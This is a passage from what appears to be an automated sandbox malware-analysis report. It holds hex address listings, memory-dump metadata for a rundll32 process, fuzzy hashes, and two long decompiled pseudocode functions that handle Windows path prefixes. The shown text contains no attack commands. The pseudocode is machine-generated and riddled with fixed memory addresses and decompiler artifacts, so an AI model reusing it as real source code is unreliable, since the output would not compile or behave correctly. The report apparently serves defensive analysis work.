                                                                                                                0x044d62b2
                                                                                                                0x044d62b2
                                                                                                                0x044d62b5
                                                                                                                0x044d62dd
                                                                                                                0x044d62e2
                                                                                                                0x044d62e5
                                                                                                                0x044d62b7
                                                                                                                0x044d62b8
                                                                                                                0x044d62bb
                                                                                                                0x044d62bd
                                                                                                                0x044d62c0
                                                                                                                0x044d62c4
                                                                                                                0x044d62cd
                                                                                                                0x044d62cd
                                                                                                                0x044d62c0
                                                                                                                0x044d62bb
                                                                                                                0x044d62b5
                                                                                                                0x044d6302
                                                                                                                0x044d6303
                                                                                                                0x044d6305
                                                                                                                0x044d6305
                                                                                                                0x044d6305
                                                                                                                0x044d630c
                                                                                                                0x044d630c
                                                                                                                0x00000000
                                                                                                                0x044d627e
                                                                                                                0x044d6269
                                                                                                                0x044d5eac
                                                                                                                0x044d5ebb
                                                                                                                0x044d5ebe

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 43755ab327cb46a01f51f9b08429c1adc8ee16f05fa9fe2a7eeaa0f99286a20c
                                                                                                                • Instruction ID: 3d534a61867ebfb5ed3b3623d6d32e7396c0f3231b6ac888b94c57b17b050073
                                                                                                                • Opcode Fuzzy Hash: 43755ab327cb46a01f51f9b08429c1adc8ee16f05fa9fe2a7eeaa0f99286a20c
                                                                                                                • Instruction Fuzzy Hash: 69422C75A00229DFDF24CF68C890BAAB7B1FF45304F1581AAD94DAB342DB74A985CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E04424120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                                                                                				signed int _v8;
                                                                                                                				void* _v20;
                                                                                                                				signed int _v24;
                                                                                                                				char _v532;
                                                                                                                				char _v540;
                                                                                                                				signed short _v544;
                                                                                                                				signed int _v548;
                                                                                                                				signed short* _v552;
                                                                                                                				signed short _v556;
                                                                                                                				signed short* _v560;
                                                                                                                				signed short* _v564;
                                                                                                                				signed short* _v568;
                                                                                                                				void* _v570;
                                                                                                                				signed short* _v572;
                                                                                                                				signed short _v576;
                                                                                                                				signed int _v580;
                                                                                                                				char _v581;
                                                                                                                				void* _v584;
                                                                                                                				unsigned int _v588;
                                                                                                                				signed short* _v592;
                                                                                                                				void* _v597;
                                                                                                                				void* _v600;
                                                                                                                				void* _v604;
                                                                                                                				void* _v609;
                                                                                                                				void* _v616;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				unsigned int _t161;
                                                                                                                				signed int _t162;
                                                                                                                				unsigned int _t163;
                                                                                                                				void* _t169;
                                                                                                                				signed short _t173;
                                                                                                                				signed short _t177;
                                                                                                                				signed short _t181;
                                                                                                                				unsigned int _t182;
                                                                                                                				signed int _t185;
                                                                                                                				signed int _t213;
                                                                                                                				signed int _t225;
                                                                                                                				short _t233;
                                                                                                                				signed char _t234;
                                                                                                                				signed int _t242;
                                                                                                                				signed int _t243;
                                                                                                                				signed int _t244;
                                                                                                                				signed int _t245;
                                                                                                                				signed int _t250;
                                                                                                                				void* _t251;
                                                                                                                				signed short* _t254;
                                                                                                                				void* _t255;
                                                                                                                				signed int _t256;
                                                                                                                				void* _t257;
                                                                                                                				signed short* _t260;
                                                                                                                				signed short _t265;
                                                                                                                				signed short* _t269;
                                                                                                                				signed short _t271;
                                                                                                                				signed short** _t272;
                                                                                                                				signed short* _t275;
                                                                                                                				signed short _t282;
                                                                                                                				signed short _t283;
                                                                                                                				signed short _t290;
                                                                                                                				signed short _t299;
                                                                                                                				signed short _t307;
                                                                                                                				signed int _t308;
                                                                                                                				signed short _t311;
                                                                                                                				signed short* _t315;
                                                                                                                				signed short _t316;
                                                                                                                				void* _t317;
                                                                                                                				void* _t319;
                                                                                                                				signed short* _t321;
                                                                                                                				void* _t322;
                                                                                                                				void* _t323;
                                                                                                                				unsigned int _t324;
                                                                                                                				signed int _t325;
                                                                                                                				void* _t326;
                                                                                                                				signed int _t327;
                                                                                                                				signed int _t329;
                                                                                                                
                                                                                                                				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                                                                                				_v8 =  *0x44fd360 ^ _t329;
                                                                                                                				_t157 = _a8;
                                                                                                                				_t321 = _a4;
                                                                                                                				_t315 = __edx;
                                                                                                                				_v548 = __ecx;
                                                                                                                				_t305 = _a20;
                                                                                                                				_v560 = _a12;
                                                                                                                				_t260 = _a16;
                                                                                                                				_v564 = __edx;
                                                                                                                				_v580 = _a8;
                                                                                                                				_v572 = _t260;
                                                                                                                				_v544 = _a20;
                                                                                                                				if( *__edx <= 8) {
                                                                                                                					L3:
                                                                                                                					if(_t260 != 0) {
                                                                                                                						 *_t260 = 0;
                                                                                                                					}
                                                                                                                					_t254 =  &_v532;
                                                                                                                					_v588 = 0x208;
                                                                                                                					if((_v548 & 0x00000001) != 0) {
                                                                                                                						_v556 =  *_t315;
                                                                                                                						_v552 = _t315[2];
                                                                                                                						_t161 = E0443F232( &_v556);
                                                                                                                						_t316 = _v556;
                                                                                                                						_v540 = _t161;
                                                                                                                						goto L17;
                                                                                                                					} else {
                                                                                                                						_t306 = 0x208;
                                                                                                                						_t298 = _t315;
                                                                                                                						_t316 = E04426E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                                                                                						if(_t316 == 0) {
                                                                                                                							L68:
                                                                                                                							_t322 = 0xc0000033;
                                                                                                                							goto L39;
                                                                                                                						} else {
                                                                                                                							while(_v581 == 0) {
                                                                                                                								_t233 = _v588;
                                                                                                                								if(_t316 > _t233) {
                                                                                                                									_t234 = _v548;
                                                                                                                									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                                                                                										_t254 = L04424620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                                                                                										if(_t254 == 0) {
                                                                                                                											_t169 = 0xc0000017;
                                                                                                                										} else {
                                                                                                                											_t298 = _v564;
                                                                                                                											_v588 = _t316;
                                                                                                                											_t306 = _t316;
                                                                                                                											_t316 = E04426E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                                                                                											if(_t316 != 0) {
                                                                                                                												continue;
                                                                                                                											} else {
                                                                                                                												goto L68;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										goto L90;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									_v556 = _t316;
                                                                                                                									 *((short*)(_t329 + 0x32)) = _t233;
                                                                                                                									_v552 = _t254;
                                                                                                                									if(_t316 < 2) {
                                                                                                                										L11:
                                                                                                                										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                                                                                											_t161 = 5;
                                                                                                                										} else {
                                                                                                                											if(_t316 < 6) {
                                                                                                                												L87:
                                                                                                                												_t161 = 3;
                                                                                                                											} else {
                                                                                                                												_t242 = _t254[2] & 0x0000ffff;
                                                                                                                												if(_t242 != 0x5c) {
                                                                                                                													if(_t242 == 0x2f) {
                                                                                                                														goto L16;
                                                                                                                													} else {
                                                                                                                														goto L87;
                                                                                                                													}
                                                                                                                													goto L101;
                                                                                                                												} else {
                                                                                                                													L16:
                                                                                                                													_t161 = 2;
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										_t243 =  *_t254 & 0x0000ffff;
                                                                                                                										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                                                                                											if(_t316 < 4) {
                                                                                                                												L81:
                                                                                                                												_t161 = 4;
                                                                                                                												goto L17;
                                                                                                                											} else {
                                                                                                                												_t244 = _t254[1] & 0x0000ffff;
                                                                                                                												if(_t244 != 0x5c) {
                                                                                                                													if(_t244 == 0x2f) {
                                                                                                                														goto L60;
                                                                                                                													} else {
                                                                                                                														goto L81;
                                                                                                                													}
                                                                                                                												} else {
                                                                                                                													L60:
                                                                                                                													if(_t316 < 6) {
                                                                                                                														L83:
                                                                                                                														_t161 = 1;
                                                                                                                														goto L17;
                                                                                                                													} else {
                                                                                                                														_t245 = _t254[2] & 0x0000ffff;
                                                                                                                														if(_t245 != 0x2e) {
                                                                                                                															if(_t245 == 0x3f) {
                                                                                                                																goto L62;
                                                                                                                															} else {
                                                                                                                																goto L83;
                                                                                                                															}
                                                                                                                														} else {
                                                                                                                															L62:
                                                                                                                															if(_t316 < 8) {
                                                                                                                																L85:
                                                                                                                																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                                                                                																goto L17;
                                                                                                                															} else {
                                                                                                                																_t250 = _t254[3] & 0x0000ffff;
                                                                                                                																if(_t250 != 0x5c) {
                                                                                                                																	if(_t250 == 0x2f) {
                                                                                                                																		goto L64;
                                                                                                                																	} else {
                                                                                                                																		goto L85;
                                                                                                                																	}
                                                                                                                																} else {
                                                                                                                																	L64:
                                                                                                                																	_t161 = 6;
                                                                                                                																	goto L17;
                                                                                                                																}
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                											goto L101;
                                                                                                                										} else {
                                                                                                                											goto L11;
                                                                                                                										}
                                                                                                                									}
                                                                                                                									L17:
                                                                                                                									if(_t161 != 2) {
                                                                                                                										_t162 = _t161 - 1;
                                                                                                                										if(_t162 > 5) {
                                                                                                                											goto L18;
                                                                                                                										} else {
                                                                                                                											switch( *((intOrPtr*)(_t162 * 4 +  &M044245F8))) {
                                                                                                                												case 0:
                                                                                                                													_v568 = 0x43e1078;
                                                                                                                													__eax = 2;
                                                                                                                													goto L20;
                                                                                                                												case 1:
                                                                                                                													goto L18;
                                                                                                                												case 2:
                                                                                                                													_t163 = 4;
                                                                                                                													goto L19;
                                                                                                                											}
                                                                                                                										}
                                                                                                                										goto L41;
                                                                                                                									} else {
                                                                                                                										L18:
                                                                                                                										_t163 = 0;
                                                                                                                										L19:
                                                                                                                										_v568 = 0x43e11c4;
                                                                                                                									}
                                                                                                                									L20:
                                                                                                                									_v588 = _t163;
                                                                                                                									_v564 = _t163 + _t163;
                                                                                                                									_t306 =  *_v568 & 0x0000ffff;
                                                                                                                									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                                                                                									_v576 = _t265;
                                                                                                                									if(_t265 > 0xfffe) {
                                                                                                                										L90:
                                                                                                                										_t322 = 0xc0000106;
                                                                                                                									} else {
                                                                                                                										if(_t321 != 0) {
                                                                                                                											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                                                                                												if(_v580 != 0) {
                                                                                                                													goto L23;
                                                                                                                												} else {
                                                                                                                													_t322 = 0xc0000106;
                                                                                                                													goto L39;
                                                                                                                												}
                                                                                                                											} else {
                                                                                                                												_t177 = _t306;
                                                                                                                												goto L25;
                                                                                                                											}
                                                                                                                											goto L101;
                                                                                                                										} else {
                                                                                                                											if(_v580 == _t321) {
                                                                                                                												_t322 = 0xc000000d;
                                                                                                                											} else {
                                                                                                                												L23:
                                                                                                                												_t173 = L04424620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                                                                                												_t269 = _v592;
                                                                                                                												_t269[2] = _t173;
                                                                                                                												if(_t173 == 0) {
                                                                                                                													_t322 = 0xc0000017;
                                                                                                                												} else {
                                                                                                                													_t316 = _v556;
                                                                                                                													 *_t269 = 0;
                                                                                                                													_t321 = _t269;
                                                                                                                													_t269[1] = _v576;
                                                                                                                													_t177 =  *_v568 & 0x0000ffff;
                                                                                                                													L25:
                                                                                                                													_v580 = _t177;
                                                                                                                													if(_t177 == 0) {
                                                                                                                														L29:
                                                                                                                														_t307 =  *_t321 & 0x0000ffff;
                                                                                                                													} else {
                                                                                                                														_t290 =  *_t321 & 0x0000ffff;
                                                                                                                														_v576 = _t290;
                                                                                                                														_t310 = _t177 & 0x0000ffff;
                                                                                                                														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                                                                                															_t307 =  *_t321 & 0xffff;
                                                                                                                														} else {
                                                                                                                															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                                                                                															E0444F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                                                                                															_t329 = _t329 + 0xc;
                                                                                                                															_t311 = _v580;
                                                                                                                															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                                                                                															 *_t321 = _t225;
                                                                                                                															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                                                																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                															}
                                                                                                                															goto L29;
                                                                                                                														}
                                                                                                                													}
                                                                                                                													_t271 = _v556 - _v588 + _v588;
                                                                                                                													_v580 = _t307;
                                                                                                                													_v576 = _t271;
                                                                                                                													if(_t271 != 0) {
                                                                                                                														_t308 = _t271 & 0x0000ffff;
                                                                                                                														_v588 = _t308;
                                                                                                                														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                                                                                															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                                                                                															E0444F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                                                                                															_t329 = _t329 + 0xc;
                                                                                                                															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                                                                                															 *_t321 = _t213;
                                                                                                                															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                                                																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                													_t272 = _v560;
                                                                                                                													if(_t272 != 0) {
                                                                                                                														 *_t272 = _t321;
                                                                                                                													}
                                                                                                                													_t306 = 0;
                                                                                                                													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                													_t275 = _v572;
                                                                                                                													if(_t275 != 0) {
                                                                                                                														_t306 =  *_t275;
                                                                                                                														if(_t306 != 0) {
                                                                                                                															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                                                                                														}
                                                                                                                													}
                                                                                                                													_t181 = _v544;
                                                                                                                													if(_t181 != 0) {
                                                                                                                														 *_t181 = 0;
                                                                                                                														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                                                                                														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                                                                                														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                                                                                														if(_v540 == 5) {
                                                                                                                															_t182 = E044052A5(1);
                                                                                                                															_v588 = _t182;
                                                                                                                															if(_t182 == 0) {
                                                                                                                																E0441EB70(1, 0x44f79a0);
                                                                                                                																goto L38;
                                                                                                                															} else {
                                                                                                                																_v560 = _t182 + 0xc;
                                                                                                                																_t185 = E0441AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                                                                                																if(_t185 == 0) {
                                                                                                                																	_t324 = _v588;
                                                                                                                																	goto L97;
                                                                                                                																} else {
                                                                                                                																	_t306 = _v544;
                                                                                                                																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                                                                                																	 *(_t306 + 4) = _t282;
                                                                                                                																	_v576 = _t282;
                                                                                                                																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                                                                                																	 *_t306 = _t325;
                                                                                                                																	if( *_t282 == 0x5c) {
                                                                                                                																		_t149 = _t325 - 2; // -2
                                                                                                                																		_t283 = _t149;
                                                                                                                																		 *_t306 = _t283;
                                                                                                                																		 *(_t306 + 4) = _v576 + 2;
                                                                                                                																		_t185 = _t283 & 0x0000ffff;
                                                                                                                																	}
                                                                                                                																	_t324 = _v588;
                                                                                                                																	 *(_t306 + 2) = _t185;
                                                                                                                																	if((_v548 & 0x00000002) == 0) {
                                                                                                                																		L97:
                                                                                                                																		asm("lock xadd [esi], eax");
                                                                                                                																		if((_t185 | 0xffffffff) == 0) {
                                                                                                                																			_push( *((intOrPtr*)(_t324 + 4)));
                                                                                                                																			E044495D0();
                                                                                                                																			L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                                                                                																		}
                                                                                                                																	} else {
                                                                                                                																		 *(_t306 + 0xc) = _t324;
                                                                                                                																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                                                                                																	}
                                                                                                                																	goto L38;
                                                                                                                																}
                                                                                                                															}
                                                                                                                															goto L41;
                                                                                                                														}
                                                                                                                													}
                                                                                                                													L38:
                                                                                                                													_t322 = 0;
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                									L39:
                                                                                                                									if(_t254 !=  &_v532) {
                                                                                                                										L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                                                                                									}
                                                                                                                									_t169 = _t322;
                                                                                                                								}
                                                                                                                								goto L41;
                                                                                                                							}
                                                                                                                							goto L68;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					L41:
                                                                                                                					_pop(_t317);
                                                                                                                					_pop(_t323);
                                                                                                                					_pop(_t255);
                                                                                                                					return E0444B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                                                                                				} else {
                                                                                                                					_t299 = __edx[2];
                                                                                                                					if( *_t299 == 0x5c) {
                                                                                                                						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                                                                                						if(_t256 != 0x5c) {
                                                                                                                							if(_t256 != 0x3f) {
                                                                                                                								goto L2;
                                                                                                                							} else {
                                                                                                                								goto L50;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							L50:
                                                                                                                							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                                                                                								goto L2;
                                                                                                                							} else {
                                                                                                                								_t251 = E04443D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                                                                                								_pop(_t319);
                                                                                                                								_pop(_t326);
                                                                                                                								_pop(_t257);
                                                                                                                								return E0444B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						L2:
                                                                                                                						_t260 = _v572;
                                                                                                                						goto L3;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L101:
                                                                                                                			}

                                                                                                                0x0442428c
                                                                                                                0x0446e298
                                                                                                                0x04424292
                                                                                                                0x04424292
                                                                                                                0x0442429e
                                                                                                                0x044242a3
                                                                                                                0x044242a7
                                                                                                                0x044242ac
                                                                                                                0x0446e22d
                                                                                                                0x044242b2
                                                                                                                0x044242b2
                                                                                                                0x044242b9
                                                                                                                0x044242bc
                                                                                                                0x044242c2
                                                                                                                0x044242ca
                                                                                                                0x044242cd
                                                                                                                0x044242cd
                                                                                                                0x044242d4
                                                                                                                0x0442433f
                                                                                                                0x0442433f
                                                                                                                0x044242d6
                                                                                                                0x044242d6
                                                                                                                0x044242d9
                                                                                                                0x044242dd
                                                                                                                0x044242eb
                                                                                                                0x0446e23a
                                                                                                                0x044242f1
                                                                                                                0x04424305
                                                                                                                0x0442430d
                                                                                                                0x04424315
                                                                                                                0x04424318
                                                                                                                0x0442431f
                                                                                                                0x04424322
                                                                                                                0x0442432e
                                                                                                                0x0442433b
                                                                                                                0x0442433b
                                                                                                                0x00000000
                                                                                                                0x0442432e
                                                                                                                0x044242eb
                                                                                                                0x0442434c
                                                                                                                0x0442434e
                                                                                                                0x04424352
                                                                                                                0x04424359
                                                                                                                0x0442435e
                                                                                                                0x04424361
                                                                                                                0x0442436e
                                                                                                                0x0442438a
                                                                                                                0x0442438e
                                                                                                                0x04424396
                                                                                                                0x0442439e
                                                                                                                0x044243a1
                                                                                                                0x044243ad
                                                                                                                0x044243bb
                                                                                                                0x044243bb
                                                                                                                0x044243ad
                                                                                                                0x0442436e
                                                                                                                0x044243bf
                                                                                                                0x044243c5
                                                                                                                0x04424463
                                                                                                                0x04424463
                                                                                                                0x044243ce
                                                                                                                0x044243d5
                                                                                                                0x044243d9
                                                                                                                0x044243df
                                                                                                                0x04424475
                                                                                                                0x04424479
                                                                                                                0x04424491
                                                                                                                0x04424491
                                                                                                                0x04424479
                                                                                                                0x044243e5
                                                                                                                0x044243eb
                                                                                                                0x044243f4
                                                                                                                0x044243f6
                                                                                                                0x044243f9
                                                                                                                0x044243fc
                                                                                                                0x044243ff
                                                                                                                0x044244e8
                                                                                                                0x044244ed
                                                                                                                0x044244f3
                                                                                                                0x0446e247
                                                                                                                0x00000000
                                                                                                                0x044244f9
                                                                                                                0x04424504
                                                                                                                0x04424508
                                                                                                                0x0442450f
                                                                                                                0x0446e269
                                                                                                                0x00000000
                                                                                                                0x04424515
                                                                                                                0x04424519
                                                                                                                0x04424531
                                                                                                                0x04424534
                                                                                                                0x04424537
                                                                                                                0x0442453e
                                                                                                                0x04424541
                                                                                                                0x0442454a
                                                                                                                0x0446e255
                                                                                                                0x0446e255
                                                                                                                0x0446e25b
                                                                                                                0x0446e25e
                                                                                                                0x0446e261
                                                                                                                0x0446e261
                                                                                                                0x04424555
                                                                                                                0x04424559
                                                                                                                0x0442455d
                                                                                                                0x0446e26d
                                                                                                                0x0446e270
                                                                                                                0x0446e274
                                                                                                                0x0446e27a
                                                                                                                0x0446e27d
                                                                                                                0x0446e28e
                                                                                                                0x0446e28e
                                                                                                                0x04424563
                                                                                                                0x04424563
                                                                                                                0x04424569
                                                                                                                0x04424569
                                                                                                                0x00000000
                                                                                                                0x0442455d
                                                                                                                0x0442450f
                                                                                                                0x00000000
                                                                                                                0x044244f3
                                                                                                                0x044243ff
                                                                                                                0x04424405
                                                                                                                0x04424405
                                                                                                                0x04424405
                                                                                                                0x044242ac
                                                                                                                0x0442428c
                                                                                                                0x04424282
                                                                                                                0x04424407
                                                                                                                0x0442440d
                                                                                                                0x0446e2af
                                                                                                                0x0446e2af
                                                                                                                0x04424413
                                                                                                                0x04424413
                                                                                                                0x00000000
                                                                                                                0x044241d4
                                                                                                                0x00000000
                                                                                                                0x044241c3
                                                                                                                0x044241bd
                                                                                                                0x04424415
                                                                                                                0x04424415
                                                                                                                0x04424416
                                                                                                                0x04424417
                                                                                                                0x04424429
                                                                                                                0x0442416e
                                                                                                                0x0442416e
                                                                                                                0x04424175
                                                                                                                0x04424498
                                                                                                                0x0442449f
                                                                                                                0x0446e12d
                                                                                                                0x00000000
                                                                                                                0x0446e133
                                                                                                                0x00000000
                                                                                                                0x0446e133
                                                                                                                0x044244a5
                                                                                                                0x044244a5
                                                                                                                0x044244aa
                                                                                                                0x00000000
                                                                                                                0x044244bb
                                                                                                                0x044244ca
                                                                                                                0x044244d6
                                                                                                                0x044244d7
                                                                                                                0x044244d8
                                                                                                                0x044244e3
                                                                                                                0x044244e3
                                                                                                                0x044244aa
                                                                                                                0x0442417b
                                                                                                                0x0442417b
                                                                                                                0x0442417b
                                                                                                                0x00000000
                                                                                                                0x0442417b
                                                                                                                0x04424175
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5fff62569b6182d40e75f42e257f8b2a96c00722aee6f9f105fb45f08e843485
                                                                                                                • Instruction ID: c2adb1cc5e0e86de374d9854d9ddfbb4c346b9422ee0d40c9a65e9c03a9ca491
                                                                                                                • Opcode Fuzzy Hash: 5fff62569b6182d40e75f42e257f8b2a96c00722aee6f9f105fb45f08e843485
                                                                                                                • Instruction Fuzzy Hash: 2EF18D746086218BDB24CF59C580A7BB7E1EF88748F94492FF486CB391E734E981DB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E044320A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed char _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				signed int _v32;
                                                                                                                				void* _v36;
                                                                                                                				char _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				unsigned int _v60;
                                                                                                                				char _v64;
                                                                                                                				unsigned int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				char _v73;
                                                                                                                				signed int _v74;
                                                                                                                				char _v75;
                                                                                                                				signed int _v76;
                                                                                                                				void* _v81;
                                                                                                                				void* _v82;
                                                                                                                				void* _v89;
                                                                                                                				void* _v92;
                                                                                                                				void* _v97;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed char _t128;
                                                                                                                				void* _t129;
                                                                                                                				signed int _t130;
                                                                                                                				void* _t132;
                                                                                                                				signed char _t133;
                                                                                                                				intOrPtr _t135;
                                                                                                                				signed int _t137;
                                                                                                                				signed int _t140;
                                                                                                                				signed int* _t144;
                                                                                                                				signed int* _t145;
                                                                                                                				intOrPtr _t146;
                                                                                                                				signed int _t147;
                                                                                                                				signed char* _t148;
                                                                                                                				signed int _t149;
                                                                                                                				signed int _t153;
                                                                                                                				signed int _t169;
                                                                                                                				signed int _t174;
                                                                                                                				signed int _t180;
                                                                                                                				void* _t197;
                                                                                                                				void* _t198;
                                                                                                                				signed int _t201;
                                                                                                                				intOrPtr* _t202;
                                                                                                                				intOrPtr* _t205;
                                                                                                                				signed int _t210;
                                                                                                                				signed int _t215;
                                                                                                                				signed int _t218;
                                                                                                                				signed char _t221;
                                                                                                                				signed int _t226;
                                                                                                                				char _t227;
                                                                                                                				signed int _t228;
                                                                                                                				void* _t229;
                                                                                                                				unsigned int _t231;
                                                                                                                				void* _t235;
                                                                                                                				signed int _t240;
                                                                                                                				signed int _t241;
                                                                                                                				void* _t242;
                                                                                                                				signed int _t246;
                                                                                                                				signed int _t248;
                                                                                                                				signed int _t252;
                                                                                                                				signed int _t253;
                                                                                                                				void* _t254;
                                                                                                                				intOrPtr* _t256;
                                                                                                                				intOrPtr _t257;
                                                                                                                				unsigned int _t262;
                                                                                                                				signed int _t265;
                                                                                                                				void* _t267;
                                                                                                                				signed int _t275;
                                                                                                                
                                                                                                                				_t198 = __ebx;
                                                                                                                				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                                                                                                				_v68 = __ecx;
                                                                                                                				_v73 = 0;
                                                                                                                				_t201 = __edx & 0x00002000;
                                                                                                                				_t128 = __edx & 0xffffdfff;
                                                                                                                				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                                                                                                				_v72 = _t128;
                                                                                                                				if((_t128 & 0x00000008) != 0) {
                                                                                                                					__eflags = _t128 - 8;
                                                                                                                					if(_t128 != 8) {
                                                                                                                						L69:
                                                                                                                						_t129 = 0xc000000d;
                                                                                                                						goto L23;
                                                                                                                					} else {
                                                                                                                						_t130 = 0;
                                                                                                                						_v72 = 0;
                                                                                                                						_v75 = 1;
                                                                                                                						L2:
                                                                                                                						_v74 = 1;
                                                                                                                						_t226 =  *0x44f8714; // 0x0
                                                                                                                						if(_t226 != 0) {
                                                                                                                							__eflags = _t201;
                                                                                                                							if(_t201 != 0) {
                                                                                                                								L62:
                                                                                                                								_v74 = 1;
                                                                                                                								L63:
                                                                                                                								_t130 = _t226 & 0xffffdfff;
                                                                                                                								_v72 = _t130;
                                                                                                                								goto L3;
                                                                                                                							}
                                                                                                                							_v74 = _t201;
                                                                                                                							__eflags = _t226 & 0x00002000;
                                                                                                                							if((_t226 & 0x00002000) == 0) {
                                                                                                                								goto L63;
                                                                                                                							}
                                                                                                                							goto L62;
                                                                                                                						}
                                                                                                                						L3:
                                                                                                                						_t227 = _v75;
                                                                                                                						L4:
                                                                                                                						_t240 = 0;
                                                                                                                						_v56 = 0;
                                                                                                                						_t252 = _t130 & 0x00000100;
                                                                                                                						if(_t252 != 0 || _t227 != 0) {
                                                                                                                							_t240 = _v68;
                                                                                                                							_t132 = E04432EB0(_t240);
                                                                                                                							__eflags = _t132 - 2;
                                                                                                                							if(_t132 != 2) {
                                                                                                                								__eflags = _t132 - 1;
                                                                                                                								if(_t132 == 1) {
                                                                                                                									goto L25;
                                                                                                                								}
                                                                                                                								__eflags = _t132 - 6;
                                                                                                                								if(_t132 == 6) {
                                                                                                                									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                                                                                                									if( *((short*)(_t240 + 4)) != 0x3f) {
                                                                                                                										goto L40;
                                                                                                                									}
